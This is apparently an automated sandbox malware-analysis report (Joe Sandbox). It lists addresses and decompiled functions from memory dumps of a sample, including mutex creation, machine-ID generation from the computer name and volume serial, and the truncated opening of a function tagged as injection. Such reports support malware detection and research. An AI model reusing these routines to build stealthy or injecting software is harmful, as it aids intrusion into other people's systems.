0x005c699f
0x005c699f
0x005c69a9
0x005c69ae
0x005c69b1
0x005c69b6
0x005c6cfa
0x005c6cfa
0x005c6cfc
0x00000000
0x005c69bc
0x005c69c4
0x005c69c9
0x005c69cc
0x005c69ce
0x005c6d3e
0x00000000
0x005c69d4
0x005c69d4
0x005c69de
0x005c69f0
0x005c69f5
0x005c69fc
0x005c6a02
0x005c6a09
0x005c6a0e
0x005c6a18
0x005c6a22
0x005c6a29
0x005c6a30
0x005c6a37
0x005c6a3f
0x005c6a47
0x005c6a4e
0x005c6a58
0x005c6a5f
0x005c6a68
0x005c6a70
0x005c6a76
0x005c6a78
0x005c6a7c
0x005c704e
0x005c704e
0x005c704f
0x005c7050
0x005c7053
0x005c7054
0x005c7055
0x005c705c
0x005c706d
0x005c7073
0x005c7076
0x005c707c
0x005c707f
0x005c7081
0x005c7088
0x005c708d
0x005c708f
0x005c7096
0x005c709c
0x005c709c
0x005c70a3
0x005c70a5
0x005c70a7
0x005c70a7
0x005c70aa
0x005c70ad
0x005c70af
0x005c70bb
0x005c70c1
0x005c70c1
0x005c70c8
0x005c70ca
0x005c70cc
0x005c70cc
0x005c70d2
0x005c70d4
0x005c710b
0x005c710b
0x005c70d6
0x005c70d6
0x005c70de
0x005c70e7
0x005c70f1
0x005c70f9
0x005c70fd
0x005c7101
0x005c7104
0x005c7106
0x005c7106
0x005c7111
0x005c7119
0x005c711b
0x005c711b
0x005c711b
0x005c711f
0x005c711f
0x005c712e
0x005c6a82
0x005c6a8a
0x005c6a8e
0x005c6a99
0x005c6aa0
0x005c6aab
0x005c6ab8
0x005c6abd
0x005c6ac0
0x005c6ac4
0x005c6ac7
0x005c6acf
0x005c6ad5
0x005c6ad7
0x005c6ad9
0x005c6ae3
0x005c6ae3
0x005c6ae7
0x005c6aed
0x005c6af2
0x005c6af5
0x005c6afc
0x005c6afe
0x005c6b0d
0x005c6b13
0x005c6b15
0x005c6b17
0x00000000
0x005c6b1d
0x005c6b1d
0x005c6b23
0x005c6b2e
0x005c6b39
0x005c6b44
0x005c6b56
0x005c6b61
0x005c6b6c
0x005c6b7e
0x005c6b89
0x005c6b94
0x005c6b9f
0x005c6be0
0x005c6be3
0x005c6be7
0x005c6be9
0x005c6bed
0x005c6bef
0x005c6bf1
0x005c6bf3
0x005c6bf6
0x005c6bfc
0x005c6bfc
0x005c6c02
0x005c6c05
0x005c6c07
0x005c6c0a
0x005c6c0f
0x005c6c0f
0x005c6c13
0x005c6c18
0x005c6c18
0x005c6c1b
0x005c6c1f
0x005c6c26
0x005c6c28
0x005c6c2a
0x005c6c2c
0x005c6c2f
0x005c6c35
0x005c6c35
0x005c6c3b
0x005c6c3e
0x005c6c40
0x005c6c43
0x005c6c48
0x005c6c48
0x005c6c4c
0x005c6c51
0x005c6c51
0x005c6c54
0x005c6c5f
0x005c6c69
0x005c6c6c
0x005c6c6e
0x005c6c70
0x005c6d53
0x005c6d59
0x005c7018
0x005c701b
0x005c7020
0x005c7023
0x00000000
0x005c6d5f
0x005c6d69
0x005c6d6e
0x005c6d71
0x005c6d73
0x005c702a
0x005c6d43
0x005c6d43
0x005c6d49
0x005c6d4e
0x00000000
0x005c6d79
0x005c6d83
0x005c6d8f
0x005c6d94
0x005c6d99
0x005c6d9b
0x005c6dab
0x005c6db9
0x005c6dbd
0x005c6dcb
0x005c6dd7
0x005c6de7
0x005c6df2
0x005c6df6
0x005c6e01
0x005c6e0a
0x005c6e14
0x005c6e18
0x005c6e20
0x005c6e24
0x005c6e2c
0x005c6e36
0x005c6e3b
0x005c6e3e
0x005c6e42
0x005c6e45
0x005c6e4d
0x005c6e53
0x005c6e55
0x005c6e59
0x005c6e5b
0x005c6e65
0x005c6e65
0x005c6e6b
0x005c6e70
0x005c6e73
0x005c6e7a
0x005c6e7c
0x005c6e8b
0x005c6e91
0x005c6e93
0x005c6e95
0x00000000
0x005c6e9b
0x005c6e9b
0x005c6ea1
0x005c6eac
0x005c6eb7
0x005c6ebf
0x005c6ecb
0x005c6ed3
0x005c6edb
0x005c6ee3
0x005c6eeb
0x005c6ef3
0x005c6efb
0x005c6f03
0x005c6f50
0x005c6f54
0x005c6f58
0x005c6f5a
0x005c6f5c
0x005c6f5e
0x005c6f61
0x005c6f67
0x005c6f67
0x005c6f6d
0x005c6f70
0x005c6f72
0x005c6f75
0x005c6f7a
0x005c6f7a
0x005c6f7e
0x005c6f83
0x005c6f83
0x005c6f86
0x005c6f8a
0x005c6f8d
0x005c6f94
0x005c6f98
0x005c6f9a
0x005c6f9c
0x005c6f9e
0x005c6fa1
0x005c6fa7
0x005c6fab
0x005c6fab
0x005c6fb1
0x005c6fb4
0x005c6fb6
0x005c6fb9
0x005c6fbe
0x005c6fc2
0x005c6fc2
0x005c6fc6
0x005c6fcb
0x005c6fcb
0x005c6fd3
0x005c6fdd
0x005c6fe0
0x005c6fe2
0x005c6fe6
0x005c6fe8
0x005c7040
0x005c7043
0x005c7048
0x005c704b
0x005c7024
0x005c7024
0x005c6cd9
0x005c6cd9
0x005c6cde
0x005c6ce4
0x005c6ce9
0x005c6cec
0x005c6cec
0x005c6cee
0x005c6d06
0x005c6d06
0x005c6d06
0x005c6fea
0x005c6ff2
0x005c6ff7
0x005c6ffc
0x005c7006
0x00000000
0x005c7006
0x00000000
0x005c6fe8
0x005c6e5d
0x005c6e5d
0x005c6e5f
0x00000000
0x00000000
0x00000000
0x00000000
0x005c6e5f
0x005c6e5b
0x005c6d73
0x005c6c76
0x005c6c7e
0x005c6c83
0x005c6c88
0x005c6c8f
0x005c6c92
0x005c6c9c
0x005c6c9c
0x005c6c9c
0x005c6c9f
0x005c6ca6
0x005c6cab
0x005c6d07
0x005c6d07
0x005c6d0b
0x005c6d0d
0x005c6d12
0x005c6d12
0x005c6d15
0x005c6d19
0x005c6d1b
0x005c6d20
0x005c6d20
0x005c6d23
0x005c6d27
0x005c6d29
0x005c6d2c
0x005c6d31
0x005c6d3d
0x005c6d3d
0x005c6c70
0x005c6adb
0x005c6adb
0x005c6add
0x00000000
0x00000000
0x00000000
0x00000000
0x005c6add
0x005c6ad9
0x005c6a7c
0x005c69ce
0x005c69b6
0x005c6999
0x005c320d
0x005c320d
0x005c3214
0x005c322b
0x005c3233
0x005c3235
0x005c323f
0x005c3216
0x005c3216
0x005c3222
0x005c3222
0x005c3214

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 4b6f3a3c9203362486197b2addf489451b87431dc79de74f0321c20a14dba732
Instruction ID: 95655cdd0682511c213526bbcdd4ca2736ebba95df780cfc55feb49615dfa5bf
Opcode Fuzzy Hash: 4b6f3a3c9203362486197b2addf489451b87431dc79de74f0321c20a14dba732
Instruction Fuzzy Hash: B132E2B5A08341AFD725DF64D884B9BBBE5FF88300F00882EF98997351E771A944DB52

Uniqueness

Uniqueness Score: -1.00%

Function 005C7340, Relevance: 7.6, APIs: 5, Instructions: 62
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E005C7340(void** __ecx) {
				char _v212;
				void* _v232;
				void* _v236;
				char _v240;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t12;
				struct _SECURITY_ATTRIBUTES* _t19;
				void* _t21;
				WCHAR* _t22;
				void** _t23;
				void** _t24;
				void** _t25;

				 *_t24 = 0;
				_t23 = __ecx;
				_t6 =  *__ecx;
				if(_t6 != 0) {
					CloseHandle(_t6);
					 *_t23 = 0;
				}
				_t22 =  &_v212;
				E005D4520(_t22, 0x25);
				_t25 =  &(_t24[2]);
				_t9 =  *0x5d9e54(_t22, 1, _t25, 0); // executed
				_t28 = _t9;
				if(_t9 == 0) {
					_t10 = 0;
					_t19 = 0;
					__eflags = 0;
					 *_t25 = 0;
				} else {
					_t10 =  *_t25;
					_t19 =  &_v240;
				}
				_v240 = 0xc;
				_v232 = 0;
				_v236 = _t10;
				_push(_t22);
				E005D3200(_t28);
				_t12 = CreateMutexW(_t19, 1, _t22); // executed
				 *_t23 = _t12;
				_t21 = _t25[1];
				if(_t21 != 0) {
					LocalFree(_t21);
					_t12 =  *_t23;
				}
				if(_t12 == 0 || GetLastError() != 0xb7) {
					__eflags = 0;
					return 0;
				} else {
					return 1;
				}
			}

0x005c7349
0x005c7350
0x005c7352
0x005c7356
0x005c7359
0x005c735f
0x005c735f
0x005c7365
0x005c736c
0x005c7371
0x005c737c
0x005c7382
0x005c7384
0x005c738f
0x005c7391
0x005c7391
0x005c7393
0x005c7386
0x005c7386
0x005c7389
0x005c7389
0x005c739a
0x005c73a2
0x005c73aa
0x005c73ae
0x005c73af
0x005c73bb
0x005c73c1
0x005c73c3
0x005c73c8
0x005c73cb
0x005c73d1
0x005c73d1
0x005c73d5
0x005c73e9
0x00000000
0x005c73e4
0x00000000
0x005c73e6

APIs

CloseHandle.KERNEL32(00000000), ref: 005C7359
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,?,00000000), ref: 005C737C
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 005C73BB
LocalFree.KERNEL32 ref: 005C73CB
GetLastError.KERNEL32 ref: 005C73D7

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: DescriptorSecurity$CloseConvertCreateErrorFreeHandleLastLocalMutexString
String ID:
API String ID: 1087375019-0
Opcode ID: 635460c2dba0fafb1261cd58f2092833db9b9c28f0727ddb1bb9fcefad275c0a
Instruction ID: 5a698cc2a193f1435d002e2dece274a48e85658622f831b8b49e58e6ed296375
Opcode Fuzzy Hash: 635460c2dba0fafb1261cd58f2092833db9b9c28f0727ddb1bb9fcefad275c0a
Instruction Fuzzy Hash: B1114670619205AFE7209F65DC89F2B7FE8BF94B01F004C2EF885D6280D77988489B62

Uniqueness

Uniqueness Score: -1.00%

Function 005D5D00, Relevance: 6.1, APIs: 4, Instructions: 143
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E005D5D00(signed int __edx) {
				struct _OSVERSIONINFOW* _t26;
				WCHAR* _t28;
				int _t30;
				WCHAR* _t31;
				WCHAR* _t34;
				signed int _t35;
				signed int _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				WCHAR* _t48;
				signed short _t49;
				signed int _t52;
				signed int _t53;
				void* _t59;
				signed short _t61;
				signed short _t62;
				intOrPtr _t63;
				DWORD* _t65;
				signed int _t66;
				signed short _t67;
				WCHAR* _t68;
				void* _t69;
				intOrPtr* _t72;
				DWORD* _t73;
				signed int* _t74;
				signed int* _t77;
				void* _t78;

				_t58 = __edx;
				_t61 = 0;
				_t78 =  *0x5d9ac0 - _t61; // 0x27a398
				 *_t72 = 0;
				if(_t78 == 0) {
					_t26 = _t72 + 8;
					_t26->dwOSVersionInfoSize = 0x11c;
					GetVersionExW(_t26);
					_t28 = E005C3180(0x410, 0);
					_t73 = _t72 + 8;
					if(_t28 == 0) {
						L2:
						return _t61;
					}
					_t65 = _t73;
					_t48 = _t28;
					 *_t65 = 0x208;
					_t30 = GetComputerNameW(_t28, _t65); // executed
					if(_t30 == 0) {
						_t31 = E005C3180(0x474, _t48);
						_t73 =  &(_t73[2]);
						_t48 = _t31;
						GetComputerNameW(_t31, _t65);
						_t66 = 0x23a;
					} else {
						_t66 = 0x208;
					}
					E005D31C0(_t48, 0x5f);
					_t74 =  &(_t73[2]);
					_t68 =  &(_t48[_t66]);
					_t74[1] = _t48;
					do {
						_t34 = _t48;
						_t48 =  &(_t48[1]);
					} while (_t34 < _t68 && ( *_t34 & 0x0000ffff) != 0);
					if(_t34 < _t68) {
						 *((intOrPtr*)(_t48 - 2)) = 0x57005f;
						E005D4520( &(_t74[0x49]), 0x76);
						_t77 =  &(_t74[2]);
						_push(_t77[5]);
						_push(_t77[5]);
						E005D68E0( &(_t48[1]), _t68 -  &(_t48[1]) >> 1,  &(_t77[0x4c]), _t77[5]);
						_t74 =  &(_t77[6]);
					}
					_t52 = _t74[1];
					if(_t52 == 0) {
						L17:
						 *_t74 = 0;
						goto L2;
					} else {
						_t35 = 0;
						while( *((short*)(_t52 + _t35 * 2)) != 0) {
							_t35 = _t35 + 1;
							if(_t66 != _t35) {
								continue;
							}
							 *_t74 = 0;
							goto L17;
						}
						_t69 = 0;
						_t62 = 0;
						_t49 = 0;
						 *_t74 = _t35;
						do {
							_t67 = _t49;
							do {
								_t49 = E005C8160(_t58) & 0x0000000f;
							} while (_t49 == _t67 && _t49 == _t62);
							Sleep(1);
							_t53 = _t49 & 0x0000ffff;
							_t39 =  *_t74;
							_t62 = _t67;
							_t59 = _t53 + 0x41;
							_t55 =  <=  ? _t59 : _t53 + 0x2a;
							_t69 = _t69 + 1;
							 *((short*)(_t74[1] + _t39 * 2)) =  <=  ? _t59 : _t53 + 0x2a;
							_t19 = _t39 + 1; // 0x1
							_t58 = _t19;
							 *_t74 = _t19;
						} while (_t69 != 0x20);
						 *((short*)(_t74[1] + 2 + _t39 * 2)) = 0;
						 *_t74 = _t39 + _t39 + 4;
						_t41 = E005C3180(_t39 + _t39 + 4, _t74[1]);
						if(_t41 == 0) {
							_t61 = 0;
							goto L2;
						}
						_t63 = _t41;
						_t42 =  *0x5d9ac0; // 0x27a398
						if(_t42 != 0) {
							E005C91E0(_t42);
						}
						 *0x5d9ac0 = _t63;
						goto L1;
					}
				}
				L1:
				_t61 = 1;
				goto L2;
			}

0x005d5d00
0x005d5d0a
0x005d5d0c
0x005d5d12
0x005d5d15
0x005d5d27
0x005d5d2b
0x005d5d32
0x005d5d3f
0x005d5d44
0x005d5d49
0x005d5d1a
0x005d5d26
0x005d5d26
0x005d5d4b
0x005d5d4d
0x005d5d4f
0x005d5d57
0x005d5d5f
0x005d5d6e
0x005d5d73
0x005d5d76
0x005d5d7a
0x005d5d80
0x005d5d61
0x005d5d61
0x005d5d61
0x005d5d88
0x005d5d8d
0x005d5d90
0x005d5d93
0x005d5d97
0x005d5d97
0x005d5d99
0x005d5d9c
0x005d5daa
0x005d5dac
0x005d5dc0
0x005d5dc5
0x005d5dcc
0x005d5dd0
0x005d5de2
0x005d5de7
0x005d5de7
0x005d5dea
0x005d5df0
0x005d5e07
0x005d5e07
0x00000000
0x005d5df2
0x005d5df2
0x005d5df4
0x005d5dfb
0x005d5dfe
0x00000000
0x00000000
0x005d5e00
0x00000000
0x005d5e00
0x005d5e13
0x005d5e15
0x005d5e17
0x005d5e19
0x005d5e1c
0x005d5e1c
0x005d5e1e
0x005d5e25
0x005d5e28
0x005d5e36
0x005d5e3c
0x005d5e3f
0x005d5e42
0x005d5e44
0x005d5e4d
0x005d5e54
0x005d5e58
0x005d5e5c
0x005d5e5c
0x005d5e5f
0x005d5e5f
0x005d5e68
0x005d5e73
0x005d5e78
0x005d5e82
0x005d5ea3
0x00000000
0x005d5ea3
0x005d5e84
0x005d5e86
0x005d5e8d
0x005d5e90
0x005d5e95
0x005d5e98
0x00000000
0x005d5e98
0x005d5df0
0x005d5d17
0x005d5d19
0x00000000

APIs

GetVersionExW.KERNEL32(?), ref: 005D5D32
GetComputerNameW.KERNEL32(00000000), ref: 005D5D57

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

GetComputerNameW.KERNEL32(00000000), ref: 005D5D7A

Part of subcall function 005C8160: GetTickCount.KERNEL32(?,?,?,005C9394), ref: 005C8169

Sleep.KERNEL32(00000001), ref: 005D5E36

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: ComputerHeapName$AllocateCountProcessSleepTickVersion
String ID:
API String ID: 3448490110-0
Opcode ID: 94c6a425e93a3fe4352c7f426c21d0368bd22d5a8709b45178e5248bca08d49c
Instruction ID: 0d654c773350bd70ff6a655a24ce4960e30c203c4094d0eb33c0c6254a352225
Opcode Fuzzy Hash: 94c6a425e93a3fe4352c7f426c21d0368bd22d5a8709b45178e5248bca08d49c
Instruction Fuzzy Hash: 2B41C3B15046059FDB30BF68DC89A6A7BE9FF94304F09482FE485C7252F6758A44CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005D3200, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E005D3200(void* __eflags, intOrPtr _a4) {
				char _v216;
				signed short _v736;
				char _v752;
				intOrPtr _v758;
				signed int _v762;
				short _v764;
				intOrPtr _v768;
				short _t20;
				void* _t24;
				signed int _t28;
				signed int _t29;
				WCHAR* _t32;
				signed int _t33;
				WCHAR* _t34;
				intOrPtr _t37;
				DWORD* _t38;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;

				_t41 = _t40 - 0x2f4;
				_t34 =  &_v736;
				 *_t41 = 0;
				E005D6610(_t34, 0, 0x208);
				_t42 = _t41 + 0xc;
				if(GetWindowsDirectoryW(_t34, 0x208) == 0) {
					_t20 = 0x43;
					_v736 = 0x43;
				} else {
					_t20 = _v736 & 0x0000ffff;
				}
				_t37 = _a4;
				_t32 =  &_v752;
				_t38 = _t42;
				 *_t32 = _t20;
				_t32[1] = 0x5c003a;
				_t32[3] = 0;
				GetVolumeInformationW(_t32, 0, 0, _t38, 0, 0, 0, 0); // executed
				_t28 =  *_t38;
				_t35 = _t28 + _t28;
				_t29 = _t28 << 3;
				_v768 = _t28 + _t28;
				_v764 = _t28 * 4;
				_t24 = 0xfffffff8;
				_t33 = _t29;
				 *_t38 = _t29;
				_v762 = _t29;
				do {
					_t33 = _t33 + _t33;
					 *(_t42 + _t24 + 0x14) = _t33;
					_t24 = _t24 + 1;
				} while (_t24 != 0);
				 *_t42 = _t33;
				E005D4520(_t37, 0xb0);
				E005D4520( &_v216, 0xb1);
				_push(_v758);
				_push(_t29 & 0x0000fff8 | 0x00000001);
				return E005D68E0(_t37, 0x64,  &_v216, _t35);
			}

0x005d3204
0x005d3211
0x005d3215
0x005d321b
0x005d3220
0x005d322d
0x005d3236
0x005d323a
0x005d322f
0x005d322f
0x005d322f
0x005d3241
0x005d3248
0x005d324c
0x005d324e
0x005d3253
0x005d325a
0x005d3268
0x005d326e
0x005d3271
0x005d327b
0x005d327e
0x005d3282
0x005d3287
0x005d328c
0x005d328e
0x005d3291
0x005d3296
0x005d3296
0x005d3298
0x005d329c
0x005d329c
0x005d329f
0x005d32a8
0x005d32bd
0x005d32ce
0x005d32d2
0x005d32e7

APIs

GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 005D3225
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005D3268

Strings

C, xrefs: 005D323A

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: DirectoryInformationVolumeWindows
String ID: C
API String ID: 3487004747-1037565863
Opcode ID: d129454c6ccfdb04b4fdfc56bde74325a06402140aa36e0f9f8b3a0e2255948f
Instruction ID: 80a9dfd531c61a2a22077ebb29f3e3bc9ebf92e95ff5af2229838c549ddc7ddb
Opcode Fuzzy Hash: d129454c6ccfdb04b4fdfc56bde74325a06402140aa36e0f9f8b3a0e2255948f
Instruction Fuzzy Hash: 3621C170505301ABE7209F18AC89B7B7BECEF85708F00452EF84896251E3359A09C762

Uniqueness

Uniqueness Score: -1.00%

Function 005CD8B0, Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E005CD8B0(intOrPtr* __ecx) {
				intOrPtr _t7;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t15;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr _t23;

				 *((short*)(__ecx + 0x14)) = 0;
				_t20 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t23 =  *0x5d9bb4; // 0x1
				if(_t23 == 0) {
					_t15 = _t21;
					E005D4520(_t15, 0x7a);
					_t12 =  *0x5d9da8(_t15, 0, 0, 0, 0); // executed
					 *0x5d9adc = _t12;
					 *0x5d9dbc(_t12, 0x15f90, 0x15f90, 0x2bf20, 0x927c0);
					InitializeCriticalSectionAndSpinCount(0x5d9b64, 0x800);
					 *0x5d9bb4 =  *0x5d9bb4 + 1;
				}
				 *0x5d9d54(0x5d9b64);
				_t7 =  *0x5d9c24; // 0x0
				_t8 = _t7 + 1;
				 *0x5d9c24 = _t8;
				 *_t20 = _t8;
				 *0x5d9d9c(0x5d9b64);
				return _t20;
			}

0x005cd8bb
0x005cd8c1
0x005cd8c3
0x005cd8c6
0x005cd8c9
0x005cd8cc
0x005cd8cf
0x005cd8d5
0x005cd8d7
0x005cd8dc
0x005cd8e9
0x005cd8ef
0x005cd906
0x005cd916
0x005cd91c
0x005cd91c
0x005cd928
0x005cd92e
0x005cd933
0x005cd934
0x005cd939
0x005cd93c
0x005cd94d

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(005D9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 005CD916
RtlEnterCriticalSection.NTDLL(005D9B64), ref: 005CD928
RtlLeaveCriticalSection.NTDLL(005D9B64), ref: 005CD93C

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CriticalSection$CountEnterInitializeLeaveSpin
String ID:
API String ID: 29772495-0
Opcode ID: 5eaf78b0c458fc2ed2a7f59c840898fd9f8bb5bdb9baa265ca2e68cf5c26cbed
Instruction ID: f3ec616f4f0ea8934054acdc5adde4b286dfdd7b9427ab7d2b00acdfb8bfb93f
Opcode Fuzzy Hash: 5eaf78b0c458fc2ed2a7f59c840898fd9f8bb5bdb9baa265ca2e68cf5c26cbed
Instruction Fuzzy Hash: 33018071A02200AFD330AF29FD49E26BFF9FBE5706B10402FB4499A261D675580ADB61

Uniqueness

Uniqueness Score: -1.00%

Function 005D2D90, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 005D2D95
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 005D2DAD

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Initialize$Security
String ID:
API String ID: 119290355-0
Opcode ID: 27de70a4a0b6e3a36139ff3999576f180bc7850e2547e8f243be4a5e1fc0e517
Instruction ID: 3df280e4141d91914cd85516da0977bab6ebf988b20997170204cf3b4bec5198
Opcode Fuzzy Hash: 27de70a4a0b6e3a36139ff3999576f180bc7850e2547e8f243be4a5e1fc0e517
Instruction Fuzzy Hash: C1D09EB1B061313AF6712A756C0DFB76A5DDB516A1F110357FD15E72D0D5208D4161F0

Uniqueness

Uniqueness Score: -1.00%

Function 005C91E0, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E005C91E0(void* _a4) {
				void* _t2;
				char _t3;

				_t2 = _a4;
				if(_t2 != 0) {
					_t3 = RtlFreeHeap( *0x5d9c2c, 8, _t2); // executed
					return _t3;
				}
				return _t2;
			}

0x005c91e0
0x005c91e6
0x005c91f1
0x00000000
0x005c91f1
0x005c91f7

APIs

RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 719fc889fff8b0e77ae11029f2af908541bd5855fcf2708b723db485a0fa25bc
Instruction ID: 695847649a6fea488b4120f989b6394113ea3d785b3fd7b81222a78471a38f8b
Opcode Fuzzy Hash: 719fc889fff8b0e77ae11029f2af908541bd5855fcf2708b723db485a0fa25bc
Instruction Fuzzy Hash: C4C09274385202AFEF30DB60ED4DF267BADFB60B42F14845AB484D20B0CE61DC08EA10

Uniqueness

Uniqueness Score: -1.00%

Function 00201317, Relevance: 1.4, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

v, xrefs: 002012E2

Memory Dump Source

Source File: 00000002.00000002.267051715.00201000.00000040.00000001.sdmp, Offset: 00201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_201000_______.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: 7d89db41b94d6e1c363906cbe82fcfdb97da2f7f099210340ad5e17987c731bd
Instruction ID: 1de268544d2e1e26f434b2939e944c78666a8fe8552c9be29acab3ea10b95d67
Opcode Fuzzy Hash: 7d89db41b94d6e1c363906cbe82fcfdb97da2f7f099210340ad5e17987c731bd
Instruction Fuzzy Hash: 875106B6514346DFDB08DF28D8459AABBA4FF84321B14869DF945CF283D731E862CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00201345, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.267051715.00201000.00000040.00000001.sdmp, Offset: 00201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_201000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3450aab041393e21055acff7db49d0c688983fa3b6482a17dc266aaa19373bdd
Instruction ID: f256f06ced0485f9c003a4b5d2d738599165e3ddcbca6b60e46580fbb92b2f53
Opcode Fuzzy Hash: 3450aab041393e21055acff7db49d0c688983fa3b6482a17dc266aaa19373bdd
Instruction Fuzzy Hash: 8841B375200249DFDB08CF28D8459AABBA5FF48320B20869DF919CF392D730E952CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 005C1250, Relevance: 70.4, APIs: 38, Strings: 2, Instructions: 363
libraryloaderinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005C1250(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v114;
				char _v116;
				char _v316;
				void* _v320;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				void* _v428;
				void* _v432;
				void _v436;
				void* _v444;
				void* _v448;
				_Unknown_base(*)()* _v452;
				intOrPtr _v456;
				void* _v460;
				void* _t120;
				void* _t136;
				struct HINSTANCE__* _t142;
				void* _t163;
				void* _t165;
				void* _t167;
				intOrPtr _t173;
				long _t180;
				WCHAR* _t181;
				SIZE_T* _t187;
				void* _t197;
				SIZE_T* _t204;
				void* _t206;
				intOrPtr* _t207;
				void* _t211;
				SIZE_T* _t213;

				_t206 = __ecx;
				_t197 = 0;
				E005D6610( &_v452, 0, 0x1b4);
				_t213 =  &(( &_v444)[3]);
				if( *((intOrPtr*)(_t206 + 0x7c)) != 0) {
					L35:
					return _t197;
				}
